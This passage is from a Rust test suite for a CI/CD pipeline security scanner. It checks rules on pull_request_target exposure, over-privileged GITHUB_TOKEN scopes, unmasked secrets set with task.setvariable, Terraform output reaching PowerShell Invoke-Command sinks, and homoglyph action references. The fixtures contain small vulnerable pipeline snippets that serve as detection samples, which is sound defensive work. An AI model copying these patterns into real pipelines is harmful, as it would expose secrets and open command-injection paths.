9965            &mut g,
9966            "lint[0]",
9967            &[(META_JOB_NAME, "lint"), (META_CHECKOUT_SELF, "true")],
9968        );
9969        // A second non-privileged step in the same job.
9970        step_with_meta(&mut g, "lint[1]", &[(META_JOB_NAME, "lint")]);
9971
9972        let mut findings = checkout_self_pr_exposure(&g);
9973        assert_eq!(findings.len(), 1);
9974        assert_eq!(findings[0].severity, Severity::High); // pre-suppression
9975        apply_compensating_controls(&g, &mut findings);
9976        assert_eq!(
9977            findings[0].severity,
9978            Severity::Info,
9979            "checkout in a job with no privileged steps must downgrade to Info"
9980        );
9981        assert!(findings[0].message.contains("downgraded"));
9982    }
9983
9984    #[test]
9985    fn suppression_checkout_pr_unchanged_when_job_has_privileged_step() {
9986        let mut g = graph_with_platform("github-actions", ".github/workflows/build.yml");
9987        g.metadata
9988            .insert(META_TRIGGER.into(), "pull_request_target".into());
9989        let secret = g.add_node(NodeKind::Secret, "DEPLOY_TOKEN", TrustZone::FirstParty);
9990        let checkout = step_with_meta(
9991            &mut g,
9992            "build[0]",
9993            &[(META_JOB_NAME, "build"), (META_CHECKOUT_SELF, "true")],
9994        );
9995        let priv_step = step_with_meta(&mut g, "build[1]", &[(META_JOB_NAME, "build")]);
9996        g.add_edge(priv_step, secret, EdgeKind::HasAccessTo);
9997        // checkout step itself has no edges
9998        let _ = checkout;
9999
10000        let mut findings = checkout_self_pr_exposure(&g);
10001        assert_eq!(findings.len(), 1);
10002        let pre = findings[0].severity;
10003        apply_compensating_controls(&g, &mut findings);
10004        assert_eq!(
10005            findings[0].severity, pre,
10006            "must NOT downgrade when same job has privileged steps"
10007        );
10008    }
10009
10010    #[test]
10011    fn suppression_trigger_context_downgraded_when_all_priv_jobs_fork_checked() {
10012        // pull_request_target trigger + every privileged step has fork-check.
10013        let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
10014        g.metadata
10015            .insert(META_TRIGGER.into(), "pull_request_target".into());
10016        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
10017        let s = step_with_meta(
10018            &mut g,
10019            "build[0]",
10020            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
10021        );
10022        g.add_edge(s, secret, EdgeKind::HasAccessTo);
10023
10024        let mut findings = trigger_context_mismatch(&g);
10025        assert_eq!(findings.len(), 1);
10026        assert_eq!(findings[0].severity, Severity::Critical);
10027        apply_compensating_controls(&g, &mut findings);
10028        assert_eq!(
10029            findings[0].severity,
10030            Severity::Medium,
10031            "trigger_context_mismatch must downgrade Critical → Medium when fork-check universal"
10032        );
10033        assert!(findings[0].message.contains("downgraded"));
10034    }
10035
10036    #[test]
10037    fn suppression_trigger_context_unchanged_when_some_priv_steps_unguarded() {
10038        let mut g = graph_with_platform("github-actions", ".github/workflows/prt.yml");
10039        g.metadata
10040            .insert(META_TRIGGER.into(), "pull_request_target".into());
10041        let secret = g.add_node(NodeKind::Secret, "DEPLOY", TrustZone::FirstParty);
10042        let s_guard = step_with_meta(
10043            &mut g,
10044            "build[0]",
10045            &[(META_JOB_NAME, "build"), (META_FORK_CHECK, "true")],
10046        );
10047        let s_no_guard = step_with_meta(&mut g, "deploy[0]", &[(META_JOB_NAME, "deploy")]);
10048        g.add_edge(s_guard, secret, EdgeKind::HasAccessTo);
10049        g.add_edge(s_no_guard, secret, EdgeKind::HasAccessTo);
10050
10051        let mut findings = trigger_context_mismatch(&g);
10052        let pre = findings[0].severity;
10053        apply_compensating_controls(&g, &mut findings);
10054        assert_eq!(findings[0].severity, pre);
10055    }
10056
10057    #[test]
10058    fn suppression_overpriv_identity_demoted_when_job_has_narrow_override() {
10059        // Workflow-level GITHUB_TOKEN is broad; one job has constrained override.
10060        let mut g = graph_with_platform("github-actions", ".github/workflows/ci.yml");
10061        let mut wf_meta = std::collections::HashMap::new();
10062        wf_meta.insert(META_PERMISSIONS.into(), "write-all".into());
10063        wf_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
10064        let wf_token = g.add_node_with_metadata(
10065            NodeKind::Identity,
10066            "GITHUB_TOKEN",
10067            TrustZone::FirstParty,
10068            wf_meta,
10069        );
10070        let mut job_meta = std::collections::HashMap::new();
10071        job_meta.insert(META_PERMISSIONS.into(), "{ contents: read }".into());
10072        job_meta.insert(META_IDENTITY_SCOPE.into(), "constrained".into());
10073        g.add_node_with_metadata(
10074            NodeKind::Identity,
10075            "GITHUB_TOKEN (build)",
10076            TrustZone::FirstParty,
10077            job_meta,
10078        );
10079        let step = g.add_node(NodeKind::Step, "build", TrustZone::FirstParty);
10080        g.add_edge(step, wf_token, EdgeKind::HasAccessTo);
10081
10082        let mut findings = over_privileged_identity(&g);
10083        // Filter to only the workflow-level finding (the constrained job-level
10084        // override won't fire over_privileged_identity by itself).
10085        let wf_findings_count = findings
10086            .iter()
10087            .filter(|f| {
10088                f.nodes_involved
10089                    .first()
10090                    .and_then(|id| g.node(*id))
10091                    .map(|n| n.name == "GITHUB_TOKEN")
10092                    .unwrap_or(false)
10093            })
10094            .count();
10095        assert_eq!(wf_findings_count, 1);
10096        apply_compensating_controls(&g, &mut findings);
10097        let demoted = findings.iter().find(|f| {
10098            f.nodes_involved
10099                .first()
10100                .and_then(|id| g.node(*id))
10101                .map(|n| n.name == "GITHUB_TOKEN")
10102                .unwrap_or(false)
10103        });
10104        let demoted = demoted.expect("workflow-level token finding still present");
10105        assert_eq!(
10106            demoted.severity,
10107            Severity::Info,
10108            "workflow-level over_priv must downgrade to Info when narrower job override exists"
10109        );
10110        assert!(demoted.message.contains("suppressed"));
10111    }
10112
10113    #[test]
10114    fn tf_output_setvariable_skips_when_sink_quotes_in_env_block() {
10115        // Sink step references `$(gdsvms)` only in `echo "$(gdsvms)"` —
10116        // a context with no shell-expansion sigils (no bash -c, no eval,
10117        // no Invoke-Command, no -split, no command substitution, not
10118        // line-leading). The value is quoted by the shell on its way
10119        // into echo's argv and never reaches an interpreter.
10120        let mut g = AuthorityGraph::new(source("ado.yml"));
10121        add_script_step_in_job(
10122            &mut g,
10123            "capture",
10124            "deploy",
10125            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
10126        );
10127        add_script_step_in_job(
10128            &mut g,
10129            "safe-echo",
10130            "deploy",
10131            "echo \"gdsvms is: $(gdsvms)\"",
10132        );
10133
10134        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10135        assert!(
10136            findings.is_empty(),
10137            "properly-quoted echo must not fire; got: {findings:#?}"
10138        );
10139    }
10140
10141    #[test]
10142    fn tf_output_setvariable_skips_when_sink_in_different_job() {
10143        // Capture and sink exist, but in different jobs. Pipeline
10144        // variable scoping in ADO is per-stage/per-job by default — the
10145        // chain doesn't compose without explicit cross-job output
10146        // wiring (which is a separate primitive).
10147        let mut g = AuthorityGraph::new(source("ado.yml"));
10148        add_script_step_in_job(
10149            &mut g,
10150            "capture",
10151            "job-a",
10152            "Write-Host \"##vso[task.setvariable variable=gdsvms]$env:TF_OUT_GDSVMS\"",
10153        );
10154        add_script_step_in_job(
10155            &mut g,
10156            "consume",
10157            "job-b",
10158            "$names = \"$(gdsvms)\" -split \",\"\n\
10159             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
10160        );
10161
10162        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10163        assert!(
10164            findings.is_empty(),
10165            "cross-job chain must not fire; got: {findings:#?}"
10166        );
10167    }
10168
10169    #[test]
10170    fn tf_output_setvariable_skips_when_setvariable_lacks_tf_capture_signal() {
10171        // Inline script emits `task.setvariable` but the source value is
10172        // a plain pipeline variable, not anything terraform-shaped.
10173        // Without a TF_OUT_* / `terraform output` capture signal in the
10174        // body, the rule must not fire — `self_mutating_pipeline`
10175        // already covers the generic setvariable primitive.
10176        let mut g = AuthorityGraph::new(source("ado.yml"));
10177        add_script_step_in_job(
10178            &mut g,
10179            "pure-setvar",
10180            "deploy",
10181            "Write-Host \"##vso[task.setvariable variable=gdsvms]$(BuildId)\"",
10182        );
10183        add_script_step_in_job(
10184            &mut g,
10185            "consume",
10186            "deploy",
10187            "$names = \"$(gdsvms)\" -split \",\"\n\
10188             foreach ($n in $names) { Invoke-Command -ComputerName $n -ScriptBlock {} }",
10189        );
10190
10191        let findings = terraform_output_via_setvariable_shell_expansion(&g);
10192        assert!(
10193            findings.is_empty(),
10194            "setvariable without terraform-output signal must not fire; got: {findings:#?}"
10195        );
10196    }
10197
10198    // ── setvariable_issecret_false ──────────────────────────
10199
10200    /// Helper: create an ADO-platform graph with a single Step whose
10201    /// `META_SCRIPT_BODY` is set to the given script.
10202    fn ado_graph_with_script(script: &str) -> AuthorityGraph {
10203        let mut g = graph_with_platform("azure-devops", "ado-pipeline.yml");
10204        let mut meta = std::collections::HashMap::new();
10205        meta.insert(META_SCRIPT_BODY.into(), script.into());
10206        g.add_node_with_metadata(NodeKind::Step, "script-step", TrustZone::FirstParty, meta);
10207        g
10208    }
10209
10210    #[test]
10211    fn setvariable_issecret_false_fires_on_explicit_false() {
10212        let g = ado_graph_with_script(
10213            r###"echo "##vso[task.setvariable variable=MY_TOKEN;issecret=false]$(token)""###,
10214        );
10215        let findings = setvariable_issecret_false(&g);
10216        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10217        assert_eq!(findings[0].severity, Severity::High);
10218        assert_eq!(
10219            findings[0].category,
10220            FindingCategory::SetvariableIssecretFalse
10221        );
10222        assert!(findings[0].message.contains("MY_TOKEN"));
10223    }
10224
10225    #[test]
10226    fn setvariable_issecret_false_skips_issecret_true() {
10227        let g = ado_graph_with_script(
10228            r###"echo "##vso[task.setvariable variable=MY_TOKEN;issecret=true]$(token)""###,
10229        );
10230        let findings = setvariable_issecret_false(&g);
10231        assert!(
10232            findings.is_empty(),
10233            "issecret=true must not fire; got: {findings:#?}"
10234        );
10235    }
10236
10237    #[test]
10238    fn setvariable_issecret_false_skips_non_sensitive_name() {
10239        let g = ado_graph_with_script(
10240            r###"echo "##vso[task.setvariable variable=BUILD_NUMBER]$(rev)""###,
10241        );
10242        let findings = setvariable_issecret_false(&g);
10243        assert!(
10244            findings.is_empty(),
10245            "non-sensitive name must not fire; got: {findings:#?}"
10246        );
10247    }
10248
10249    #[test]
10250    fn setvariable_issecret_false_fires_when_flag_omitted() {
10251        let g = ado_graph_with_script(
10252            r###"echo "##vso[task.setvariable variable=DB_PASSWORD]$(db_pass)""###,
10253        );
10254        let findings = setvariable_issecret_false(&g);
10255        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10256        assert!(findings[0].message.contains("DB_PASSWORD"));
10257    }
10258
10259    #[test]
10260    fn keyvaultname_does_not_fire() {
10261        // "key" is a substring of "keyvaultname" but not a token — must not fire.
10262        let g = ado_graph_with_script(
10263            r###"echo "##vso[task.setvariable variable=KEYVAULTNAME]my-vault""###,
10264        );
10265        let findings = setvariable_issecret_false(&g);
10266        assert!(
10267            findings.is_empty(),
10268            "keyvaultname must not fire (FP regression); got: {findings:#?}"
10269        );
10270    }
10271
10272    #[test]
10273    fn storage_account_key_still_fires() {
10274        // "key" is an exact token in "STORAGE_ACCOUNT_KEY" — must still fire.
10275        let g = ado_graph_with_script(
10276            r###"echo "##vso[task.setvariable variable=STORAGE_ACCOUNT_KEY]secret""###,
10277        );
10278        let findings = setvariable_issecret_false(&g);
10279        assert_eq!(
10280            findings.len(),
10281            1,
10282            "STORAGE_ACCOUNT_KEY must fire; got: {findings:#?}"
10283        );
10284        assert!(findings[0].message.contains("STORAGE_ACCOUNT_KEY"));
10285    }
10286
10287    #[test]
10288    fn github_author_email_does_not_fire() {
10289        // "auth" is a substring of "author" but not a token — must not fire.
10290        let g = ado_graph_with_script(
10291            r###"echo "##vso[task.setvariable variable=GITHUB_AUTHOR_EMAIL]user@example.com""###,
10292        );
10293        let findings = setvariable_issecret_false(&g);
10294        assert!(
10295            findings.is_empty(),
10296            "GITHUB_AUTHOR_EMAIL must not fire (FP regression); got: {findings:#?}"
10297        );
10298    }
10299
10300    #[test]
10301    fn cert_thumbprint_still_fires() {
10302        // "cert" is an exact token in "CERT_THUMBPRINT" — must still fire.
10303        let g = ado_graph_with_script(
10304            r###"echo "##vso[task.setvariable variable=CERT_THUMBPRINT]abc123""###,
10305        );
10306        let findings = setvariable_issecret_false(&g);
10307        assert_eq!(
10308            findings.len(),
10309            1,
10310            "CERT_THUMBPRINT must fire; got: {findings:#?}"
10311        );
10312        assert!(findings[0].message.contains("CERT_THUMBPRINT"));
10313    }
10314
10315    // ── homoglyph_in_action_ref ──────────────────────────────────
10316
10317    fn gha_graph_with_action(action: &str) -> AuthorityGraph {
10318        let mut g = AuthorityGraph::new(source("ci.yml"));
10319        g.metadata
10320            .insert(META_PLATFORM.into(), "github-actions".into());
10321        g.add_node(NodeKind::Image, action, TrustZone::ThirdParty);
10322        g
10323    }
10324
10325    #[test]
10326    fn pure_ascii_action_ref_not_flagged() {
10327        let g = gha_graph_with_action("actions/checkout@v4");
10328        let findings = check_homoglyph_in_action_ref(&g);
10329        assert!(
10330            findings.is_empty(),
10331            "pure ASCII action ref must not fire; got: {findings:#?}"
10332        );
10333    }
10334
10335    #[test]
10336    fn division_slash_homoglyph_flagged() {
10337        // U+2215 DIVISION SLASH instead of U+002F SOLIDUS
10338        let g = gha_graph_with_action("actions\u{2215}checkout@v4");
10339        let findings = check_homoglyph_in_action_ref(&g);
10340        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10341        assert_eq!(findings[0].category, FindingCategory::HomoglyphInActionRef);
10342        assert_eq!(findings[0].severity, Severity::High);
10343        assert!(findings[0].message.contains("U+2215"));
10344    }
10345
10346    #[test]
10347    fn cyrillic_a_homoglyph_flagged() {
10348        // Cyrillic small letter a (U+0430) instead of Latin a (U+0061)
10349        let g = gha_graph_with_action("\u{0430}ctions/checkout@v4");
10350        let findings = check_homoglyph_in_action_ref(&g);
10351        assert_eq!(findings.len(), 1, "got: {findings:#?}");
10352        assert_eq!(findings[0].category, FindingCategory::HomoglyphInActionRef);
10353        assert!(findings[0].message.contains("U+0430"));
10354    }
10355
10356    #[test]
10357    fn homoglyph_rule_skips_non_gha_platform() {
10358        let mut g = AuthorityGraph::new(source("ado.yml"));
10359        g.metadata
10360            .insert(META_PLATFORM.into(), "azure-devops".into());
10361        g.add_node(
10362            NodeKind::Image,
10363            "\u{0430}ctions/checkout@v4",
10364            TrustZone::ThirdParty,
10365        );
10366        let findings = check_homoglyph_in_action_ref(&g);
10367        assert!(
10368            findings.is_empty(),
10369            "non-GHA platform must not fire; got: {findings:#?}"
10370        );
10371    }
10372}